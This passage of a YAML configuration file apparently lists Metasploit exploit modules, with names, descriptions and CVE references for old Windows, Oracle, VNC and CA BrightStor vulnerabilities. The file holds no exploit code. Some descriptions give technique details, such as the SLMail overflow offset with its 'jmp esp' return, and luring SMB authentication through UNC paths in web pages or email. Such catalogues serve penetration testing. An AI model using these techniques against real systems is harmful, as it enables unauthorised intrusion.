\t\t\t\t\tThis module exploits a stack buffer overflow in the svchost service, when the netware\n\
\t\t\t\tclient service is running. This specific vulnerability is in the nwapi32.dll module.\n\
\t\t\t"
authors:
- - CVE
- 2006-4688
- - OSVDB
- "30260"
- - BID
- "21023"
- - MSB
- MS06-066
path: extensions/metasploit/
class: Msf_module
msf_ms06_066_nwwks:
enable: true
msf: true
msf_key: windows/smb/ms06_066_nwwks
name: Microsoft Services MS06-066 nwwks.dll
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the svchost service, when the netware\n\
\t\t\t\tclient service is running. This specific vulnerability is in the nwapi32.dll module.\n\
\t\t\t"
authors:
- - CVE
- 2006-4688
- - OSVDB
- "30260"
- - BID
- "21023"
- - MSB
- MS06-066
path: extensions/metasploit/
class: Msf_module
msf_ms10_061_spoolss:
enable: true
msf: true
msf_key: windows/smb/ms10_061_spoolss
name: Microsoft Print Spooler Service Impersonation Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the RPC service impersonation vulnerability detailed in\n\
\t\t\t\tMicrosoft Bulletin MS10-061. By making a specific DCE RPC request to the\n\
\t\t\t\tStartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n\
\t\t\t\tto create a file. The working directory at the time is %SystemRoot%\\system32.\n\
\t\t\t\tAn attacker can specify any file name, including directory traversal or full paths.\n\
\t\t\t\tBy sending WritePrinter requests, an attacker can fully control the content of\n\
\t\t\t\tthe created file.\n\n\
\t\t\t\tIn order to gain code execution, this module writes to a directory used by Windows\n\
\t\t\t\tManagement Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)\n\
\t\t\t\tis periodically scanned and any new .mof files are processed automatically. This is\n\
\t\t\t\tthe same technique employed by the Stuxnet code found in the wild.\n\
\t\t\t"
authors:
- - OSVDB
- "67988"
- - CVE
- 2010-2729
- - MSB
- MS10-061
path: extensions/metasploit/
class: Msf_module
msf_psexec:
enable: true
msf: true
msf_key: windows/smb/psexec
name: Microsoft Windows Authenticated User Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module uses a valid administrator username and password (or\n\
\t\t\t\tpassword hash) to execute an arbitrary payload. This module is similar\n\
\t\t\t\tto the \"psexec\" utility provided by SysInternals. This module is now able\n\
\t\t\t\tto clean up after itself. The service created by this tool uses a randomly \n\
\t\t\t\tchosen name and description.\n\
\t\t\t"
authors:
- - CVE
- 1999-0504
- - OSVDB
- "3106"
- - URL
- http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx
path: extensions/metasploit/
class: Msf_module
msf_smb_relay:
enable: true
msf: true
msf_key: windows/smb/smb_relay
name: Microsoft Windows SMB Relay Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module will relay SMB authentication requests to another\n\
\t\t\t\thost, gaining access to an authenticated SMB session if successful.\n\
\t\t\t\tIf the connecting user is an administrator and network logins are\n\
\t\t\t\tallowed to the target machine, this module will execute an arbitrary\n\
\t\t\t\tpayload. To exploit this, the target system\tmust try to\tauthenticate\n\
\t\t\t\tto this module. The easiest way to force a SMB authentication attempt\n\
\t\t\t\tis by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or\n\
\t\t\t\temail message. When the victim views the web page or email, their\n\
\t\t\t\tsystem will automatically connect to the server specified in the UNC\n\
\t\t\t\tshare (the IP address of the system running this module) and attempt\n\
\t\t\t\tto authenticate. Unfortunately, this\n\
\t\t\t\tmodule is not able to clean up after itself. The service and payload\n\
\t\t\t\tfile listed in the output will need to be manually removed after access\n\
\t\t\t\thas been gained. The service created by this tool uses a randomly chosen\n\
\t\t\t\tname and description, so the services list can become cluttered after\n\
\t\t\t\trepeated exploitation.\n\n\
\t\t\t\tThe SMB authentication relay attack was first reported by Sir Dystic on\n\
\t\t\t\tMarch 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n\
\t\t\t\tOn November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n\
\t\t\t\tincludes a patch which prevents the relaying of challenge keys back to\n\
\t\t\t\tthe host which issued them, preventing this exploit from working in\n\
\t\t\t\tthe default configuration. It is still possible to set the SMBHOST\n\
\t\t\t\tparameter to a third-party host that the victim is authorized to access,\n\
\t\t\t\tbut the \"reflection\" attack has been effectively broken.\n\
\t\t\t"
authors:
- - CVE
- 2008-4037
- - OSVDB
- "49736"
- - MSB
- MS08-068
- - URL
- http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx
- - URL
- http://en.wikipedia.org/wiki/SMBRelay
- - URL
- http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx
- - URL
- http://www.xfocus.net/articles/200305/smbrelay.html
path: extensions/metasploit/
class: Msf_module
msf_ms08_067_netapi:
enable: true
msf: true
msf_key: windows/smb/ms08_067_netapi
name: Microsoft Server Service Relative Path Stack Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a parsing flaw in the path canonicalization code of\n\
\t\t\t\tNetAPI32.dll through the Server Service. This module is capable of bypassing\n\
\t\t\t\tNX on some operating systems and service packs. The correct target must be\n\
\t\t\t\tused to prevent the Server Service (along with a dozen others in the same\n\
\t\t\t\tprocess) from crashing. Windows XP targets seem to handle multiple successful\n\
\t\t\t\texploitation events, but 2003 targets will often crash or hang on subsequent\n\
\t\t\t\tattempts. This is just the first version of this module, full support for\n\
\t\t\t\tNX bypass on 2003, along with other platforms, is still in development.\n\
\t\t\t"
authors:
- - CVE
- 2008-4250
- - OSVDB
- "49243"
- - MSB
- MS08-067
- - NEXPOSE
- dcerpc-ms-netapi-netpathcanonicalize-dos
path: extensions/metasploit/
class: Msf_module
msf_ms06_040_netapi:
enable: true
msf: true
msf_key: windows/smb/ms06_040_netapi
name: Microsoft Server Service NetpwPathCanonicalize Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n\
\t\t\t\tusing the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n\
\t\t\t\tother RPC calls could be used to exploit this service. This exploit will result in\n\
\t\t\t\ta denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n\
\t\t\t\twill likely result in a complete reboot on Windows 2000 and the termination of all\n\
\t\t\t\tSMB-related services on Windows XP. The default target for this exploit should succeed\n\
\t\t\t\ton Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.\n\
\t\t\t"
authors:
- - CVE
- 2006-3439
- - OSVDB
- "27845"
- - BID
- "19409"
- - MSB
- MS06-040
path: extensions/metasploit/
class: Msf_module
msf_netgear_wg111_beacon:
enable: true
msf: true
msf_key: windows/driver/netgear_wg111_beacon
name: NetGear WG111v2 Wireless Driver Long Beacon Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetGear WG111v2 wireless\n\
\t\t\t\tdevice driver. This stack buffer overflow allows remote code execution in kernel mode.\n\
\t\t\t\tThe stack buffer overflow is triggered when a 802.11 Beacon frame is received that\n\
\t\t\t\tcontains more than 1100 bytes worth of information elements.\n\n\
\t\t\t\tThis exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and\n\
\t\t\t\ta NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames,\n\
\t\t\t\tall cards within range of the attack will be affected. The tested adapter used\n\
\t\t\t\ta MAC address in the range of 00:18:4d:02:XX:XX.\n\n\
\t\t\t\tVulnerable clients will need to have their card in a non-associated state\n\
\t\t\t\tfor this exploit to work. The easiest way to reproduce this bug is by starting\n\
\t\t\t\tthe exploit and then unplugging and reinserting the USB card. The exploit can\n\
\t\t\t\ttake up to a minute to execute the payload, depending on system activity.\n\n\
\t\t\t\tNetGear was NOT contacted about this flaw. A search of the SecurityFocus\n\
\t\t\t\tdatabase indicates that NetGear has not provided an official patch or\n\
\t\t\t\tsolution for any of the thirty flaws listed at the time of writing. This list\n\
\t\t\t\tincludes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270,\n\
\t\t\t\t7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837,\n\
\t\t\t\t16835, 19468, and 19973.\n\n\
\t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\
\t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\
\t\t\t\t(external/ruby-lorcon/README) for more information.\n\
\t\t\t"
authors:
- - CVE
- 2006-5972
- - OSVDB
- "30473"
- - URL
- http://projects.info-pull.com/mokb/MOKB-16-11-2006.html
path: extensions/metasploit/
class: Msf_module
msf_broadcom_wifi_ssid:
enable: true
msf: true
msf_key: windows/driver/broadcom_wifi_ssid
name: Broadcom Wireless Driver Probe Response SSID Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Broadcom Wireless driver\n\
\t\t\t\tthat allows remote code execution in kernel mode by sending a 802.11 probe\n\
\t\t\t\tresponse that contains a long SSID. The target MAC address must\n\
\t\t\t\tbe provided to use this exploit. The two cards tested fell into the\n\
\t\t\t\t00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.\n\n\
\t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\
\t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\
\t\t\t\t(external/ruby-lorcon/README) for more information.\n\
\t\t\t"
authors:
- - CVE
- 2006-5882
- - OSVDB
- "30294"
- - URL
- http://projects.info-pull.com/mokb/MOKB-11-11-2006.html
path: extensions/metasploit/
class: Msf_module
msf_dlink_wifi_rates:
enable: true
msf: true
msf_key: windows/driver/dlink_wifi_rates
name: D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the A5AGU.SYS driver provided\n\
\t\t\t\twith the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow\n\
\t\t\t\tallows remote code execution in kernel mode. The stack buffer overflow is triggered\n\
\t\t\t\twhen a 802.11 Beacon frame is received that contains a long Rates information\n\
\t\t\t\telement. This exploit was tested with version 1.0.1.41 of the\n\
\t\t\t\tA5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer\n\
\t\t\t\tversions of the A5AGU.SYS driver are provided with the D-Link WUA-2340\n\
\t\t\t\tadapter and appear to resolve this flaw, but D-Link does not offer an updated\n\
\t\t\t\tdriver for the DWL-G132. Since this vulnerability is exploited via beacon frames,\n\
\t\t\t\tall cards within range of the attack will be affected. The tested adapter used\n\
\t\t\t\ta MAC address in the range of 00:11:95:f2:XX:XX.\n\n\
\t\t\t\tVulnerable clients will need to have their card in a non-associated state\n\
\t\t\t\tfor this exploit to work. The easiest way to reproduce this bug is by starting\n\
\t\t\t\tthe exploit and then accessing the Windows wireless network browser and\n\
\t\t\t\tforcing it to refresh.\n\n\
\t\t\t\tD-Link was NOT contacted about this flaw. A search of the SecurityFocus\n\
\t\t\t\tdatabase indicates that D-Link has not provided an official patch or\n\
\t\t\t\tsolution for any of the seven flaws listed at the time of writing:\n\
\t\t\t\t(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).\n\n\
\t\t\t\tAs of November 17th, 2006, D-Link has fixed the flaw it the latest version of the\n\
\t\t\t\tDWL-G132 driver (v1.21).\n\n\
\t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\
\t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\
\t\t\t\t(external/ruby-lorcon/README) for more information.\n\
\t\t\t"
authors:
- - CVE
- 2006-6055
- - OSVDB
- "30296"
- - URL
- http://projects.info-pull.com/mokb/MOKB-13-11-2006.html
- - URL
- ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip
path: extensions/metasploit/
class: Msf_module
msf_goodtech_telnet:
enable: true
msf: true
msf_key: windows/telnet/goodtech_telnet
name: GoodTech Telnet Server <= 5.0.6 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n\
\t\t\t\tversions prior to 5.0.7. By sending an overly long string, an attacker can\n\
\t\t\t\toverwrite the buffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2005-0768
- - OSVDB
- "14806"
- - BID
- "12815"
path: extensions/metasploit/
class: Msf_module
msf_gamsoft_telsrv_username:
enable: true
msf: true
msf_key: windows/telnet/gamsoft_telsrv_username
name: GAMSoft TelSrv 1.5 Username Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n\
\t\t\t\tOther versions may also be affected. The service terminates after exploitation,\n\
\t\t\t\tso you only get one chance!\n\
\t\t\t"
authors:
- - CVE
- 2000-0665
- - OSVDB
- "373"
- - BID
- "1478"
- - URL
- http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip
path: extensions/metasploit/
class: Msf_module
msf_postgres_payload:
enable: true
msf: true
msf_key: windows/postgres/postgres_payload
name: PostgreSQL for Microsoft Windows Payload Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module creates and enables a custom UDF (user defined function) on the\n\
\t\t\t\ttarget host via the UPDATE pg_largeobject method of binary injection. On\n\
\t\t\t\tdefault Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres\n\
\t\t\t\tservice account may write to the Windows temp directory, and may source\n\
\t\t\t\tUDF DLL's from there as well.\n\n\
\t\t\t\tPostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are \n\
\t\t\t\tvalid targets for this module.\n\n\
\t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\
\t\t\t\tattack is finished, as well as the UDF DLL and the OID.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_winvnc_http_get:
enable: true
msf: true
msf_key: windows/vnc/winvnc_http_get
name: WinVNC Web Server <= v3.3.3r7 GET Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in the AT&T WinVNC version\n\
\t\t\t\t<= v3.3.3r7 web server. When debugging mode with logging is\n\
\t\t\t\tenabled (non-default), an overly long GET request can overwrite\n\
\t\t\t\tthe stack. This exploit does not work well with VNC payloads!\n\
\t\t\t"
authors:
- - BID
- "2306"
- - OSVDB
- "6280"
- - CVE
- 2001-0168
path: extensions/metasploit/
class: Msf_module
msf_realvnc_client:
enable: true
msf: true
msf_key: windows/vnc/realvnc_client
name: RealVNC 3.3.7 Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).\n\
\t\t\t"
authors:
- - CVE
- 2001-0167
- - OSVDB
- "6281"
- - BID
- "2305"
path: extensions/metasploit/
class: Msf_module
msf_ultravnc_client:
enable: true
msf: true
msf_key: windows/vnc/ultravnc_client
name: UltraVNC 1.0.1 Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in UltraVNC Win32\n\
\t\t\t\tViewer 1.0.1 Release.\n\
\t\t\t"
authors:
- - CVE
- 2006-1652
- - OSVDB
- "24456"
- - BID
- "17378"
path: extensions/metasploit/
class: Msf_module
msf_ms10_045_outlook_ref_only:
enable: true
msf: true
msf_key: windows/email/ms10_045_outlook_ref_only
name: Outlook ATTACH_BY_REF_ONLY File Execution
category: Metasploit
description: "\n\
\t\t\t\tIt has been discovered that certain e-mail message cause Outlook to create Windows\n\
\t\t\t\tshortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n\
\t\t\t\tstreams with certain MAPI attachment properties, it is possible to set a path name\n\
\t\t\t\tto files to be executed. When a user double clicks on such an attachment or message,\n\
\t\t\t\tOutlook will proceed to execute the file that is set by the path name value. These\n\
\t\t\t\tfiles can be local files, but also file stored remotely for example on a file share.\n\
\t\t\t\tExploitation is limited by the fact that its is not possible for attackers to supply\n\
\t\t\t\tcommand line options.\n\
\t\t\t"
authors:
- - MSB
- MS10-045
- - CVE
- 2010-0266
- - OSVDB
- "66296"
- - BID
- "41446"
- - URL
- http://www.akitasecurity.nl/advisory.php?id=AK20091001
path: extensions/metasploit/
class: Msf_module
msf_ms10_045_outlook_ref_resolve:
enable: true
msf: true
msf_key: windows/email/ms10_045_outlook_ref_resolve
name: Outlook ATTACH_BY_REF_RESOLVE File Execution
category: Metasploit
description: "\n\
\t\t\t\tIt has been discovered that certain e-mail message cause Outlook to create Windows\n\
\t\t\t\tshortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n\
\t\t\t\tstreams with certain MAPI attachment properties, it is possible to set a path name\n\
\t\t\t\tto files to be executed. When a user double clicks on such an attachment or message,\n\
\t\t\t\tOutlook will proceed to execute the file that is set by the path name value. These\n\
\t\t\t\tfiles can be local files, but also file stored remotely for example on a file share.\n\
\t\t\t\tExploitation is limited by the fact that its is not possible for attackers to supply\n\
\t\t\t\tcommand line options.\n\
\t\t\t"
authors:
- - MSB
- MS10-045
- - CVE
- 2010-0266
- - OSVDB
- "66296"
- - BID
- "41446"
- - URL
- http://www.akitasecurity.nl/advisory.php?id=AK20091001
path: extensions/metasploit/
class: Msf_module
msf_seattlelab_pass:
enable: true
msf: true
msf_key: windows/pop3/seattlelab_pass
name: Seattle Lab Mail 5.5 POP3 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThere exists an unauthenticated buffer overflow vulnerability\n\
\t\t\t\tin the POP3 server of Seattle Lab Mail 5.5 when sending a password\n\
\t\t\t\twith excessive length.\n\n\
\t\t\t\tSuccessful exploitation should not crash either the\n\
\t\t\t\tservice or the server; however, after initial use the\n\
\t\t\t\tport cannot be reused for successive exploitation until\n\
\t\t\t\tthe service has been restarted. Consider using a command\n\
\t\t\t\texecution payload following the bind shell to restart\n\
\t\t\t\tthe service if you need to reuse the same port.\n\n\
\t\t\t\tThe overflow appears to occur in the debugging/error reporting\n\
\t\t\t\tsection of the slmail.exe executable, and there are multiple\n\
\t\t\t\toffsets that will lead to successful exploitation. This exploit\n\
\t\t\t\tuses 2606, the offset that creates the smallest overall payload.\n\
\t\t\t\tThe other offset is 4654.\n\n\
\t\t\t\tThe return address is overwritten with a \"jmp esp\" call from the\n\
\t\t\t\tapplication library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n\
\t\t\t\treturn address works against all version of Windows and service packs.\n\n\
\t\t\t\tThe last modification date on the library is dated 06/02/99. Assuming\n\
\t\t\t\tthat the code where the overflow occurs has not changed in some time,\n\
\t\t\t\tprior version of SLMail may also be vulnerable with this exploit. The\n\
\t\t\t\tauthor has not been able to acquire older versions of SLMail for\n\
\t\t\t\ttesting purposes. Please let us know if you were able to get this\n\
\t\t\t\texploit working against other SLMail versions.\n\
\t\t\t"
authors:
- - CVE
- 2003-0264
- - OSVDB
- "11975"
- - BID
- "7519"
path: extensions/metasploit/
class: Msf_module
msf_tns_arguments:
enable: true
msf: true
msf_key: windows/oracle/tns_arguments
name: Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Oracle 8i. When\n\
\t\t\t\tsending a specially crafted packet containing a overly long\n\
\t\t\t\tARGUMENTS string to the TNS service, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2001-0499
- - OSVDB
- "9427"
- - BID
- "2941"
path: extensions/metasploit/
class: Msf_module
msf_osb_ndmp_auth:
enable: true
msf: true
msf_key: windows/oracle/osb_ndmp_auth
name: Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe module exploits a stack buffer overflow in Oracle Secure Backup.\n\
\t\t\t\tWhen sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-5444
- - OSVDB
- "51340"
- - URL
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
path: extensions/metasploit/
class: Msf_module
msf_tns_service_name:
enable: true
msf: true
msf_key: windows/oracle/tns_service_name
name: Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Oracle. When\n\
\t\t\t\tsending a specially crafted packet containing a long SERVICE_NAME\n\
\t\t\t\tto the TNS service, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2002-0965
- - OSVDB
- "5041"
- - BID
- "4845"
- - URL
- http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml
- - URL
- http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf
path: extensions/metasploit/
class: Msf_module
msf_tns_auth_sesskey:
enable: true
msf: true
msf_key: windows/oracle/tns_auth_sesskey
name: Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Oracle. When\n\
\t\t\t\tsending a specially crafted packet containing a long AUTH_SESSKEY value\n\
\t\t\t\tto the TNS service, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-1979
- - OSVDB
- "59110"
- - BID
- "36747"
- - URL
- http://blogs.conus.info/node/28
- - URL
- http://blogs.conus.info/node/35
- - URL
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html
path: extensions/metasploit/
class: Msf_module
msf_lgserver:
enable: true
msf: true
msf_key: windows/brightstor/lgserver
name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n\
\t\t\t\toverflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-0449
- - OSVDB
- "31593"
- - BID
- "22342"
path: extensions/metasploit/
class: Msf_module
msf_sql_agent:
enable: true
msf: true
msf_key: windows/brightstor/sql_agent
name: CA BrightStor Agent for Microsoft SQL Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\
\t\t\t\tAgent for Microsoft SQL Server. This vulnerability was\n\
\t\t\t\tdiscovered by cybertronic[at]gmx.net.\n\
\t\t\t"
authors:
- - CVE
- 2005-1272
- - OSVDB
- "18501"
- - BID
- "14453"
- - URL
- http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities
- - URL
- http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239
path: extensions/metasploit/
class: Msf_module
msf_lgserver_rxssetdatagrowthscheduleandfilter:
enable: true
msf: true
msf_key: windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter
name: CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),\n\
\t\t\t\tan attacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3216
- - OSVDB
- "35329"
- - BID
- "24348"
path: extensions/metasploit/
class: Msf_module
msf_ca_arcserve_342:
enable: true
msf: true
msf_key: windows/brightstor/ca_arcserve_342
name: Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrighStor ARCserve r11.5 (build 3884).\n\
\t\t\t\tBy sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer\n\
\t\t\t\tand execute arbitrary code. In order to successfully exploit this vulnerability, you will need\n\
\t\t\t\tset the hostname argument (HNAME).\n\
\t\t\t"
authors:
- - BID
- "31684"
- - OSVDB
- "49468"
- - CVE
- 2008-4397
- - URL
- http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html
path: extensions/metasploit/
class: Msf_module
msf_lgserver_multi:
enable: true
msf: true
msf_key: windows/brightstor/lgserver_multi
name: CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,\n\
\t\t\t\tan attacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3216
- - OSVDB
- "35329"
- - BID
- "24348"
path: extensions/metasploit/
class: Msf_module
msf_message_engine_72:
enable: true
msf: true
msf_key: windows/brightstor/message_engine_72
name: CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\t11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n\
\t\t\t\tthe buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68329"
- - URL
- http://www.metasploit.com/users/mc
path: extensions/metasploit/
class: Msf_module
msf_tape_engine_8A:
enable: true
msf: true
msf_key: windows/brightstor/tape_engine_8A
name: CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tr11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n\
\t\t\t\tthe buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68330"
- - URL
- http://www.metasploit.com/users/mc
path: extensions/metasploit/
class: Msf_module
msf_hsmserver:
enable: true
msf: true
msf_key: windows/brightstor/hsmserver
name: CA BrightStor HSM Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM.\n\
\t\t\t\tBy sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5082
- - OSVDB
- "41363"
- - BID
- "25823"
path: extensions/metasploit/
class: Msf_module
msf_universal_agent:
enable: true
msf: true
msf_key: windows/brightstor/universal_agent
name: CA BrightStor Universal Agent Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a convoluted heap overflow in the CA\n\
\t\t\t\tBrightStor Universal Agent service. Triple userland\n\
\t\t\t\texception results in heap growth and execution of\n\
\t\t\t\tdereferenced function pointer at a specified address.\n\
\t\t\t"
authors:
- - CVE
- 2005-1018
- - OSVDB
- "15471"
- - BID
- "13102"
- - URL
- http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_lgserver_rxsuselicenseini:
enable: true
msf: true
msf_key: windows/brightstor/lgserver_rxsuselicenseini
name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an\n\
\t\t\t\tattacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3216
- - OSVDB
- "35329"
- - BID
- "24348"
path: extensions/metasploit/
class: Msf_module
msf_license_gcr:
enable: true
msf: true
msf_key: windows/brightstor/license_gcr
name: CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.\n\
\t\t\t\tBy sending a specially crafted request to the lic98rmtd.exe service, an attacker\n\
\t\t\t\tcould overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2005-0581
- - OSVDB
- "14389"
- - BID
- "12705"
path: extensions/metasploit/
class: Msf_module
msf_discovery_udp:
enable: true
msf: true
msf_key: windows/brightstor/discovery_udp
name: CA BrightStor Discovery Service Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\
\t\t\t\tDiscovery Service. This vulnerability occurs when a large\n\
\t\t\t\trequest is sent to UDP port 41524, triggering a stack buffer\n\
\t\t\t\toverflow.\n\
\t\t\t"
authors:
- - CVE
- 2005-0260
- - OSVDB
- "13613"
- - BID
- "12491"
- - URL
- http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_message_engine_heap:
enable: true
msf: true
msf_key: windows/brightstor/message_engine_heap
name: CA BrightStor ARCserve Message Engine Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\t11.5. By sending a specially crafted RPC request, an attacker could overflow the\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-5143
- - OSVDB
- "29533"
- - BID
- "20365"
path: extensions/metasploit/
class: Msf_module
msf_tape_engine:
enable: true
msf: true
msf_key: windows/brightstor/tape_engine
name: CA BrightStor ARCserve Tape Engine Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tr11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n\
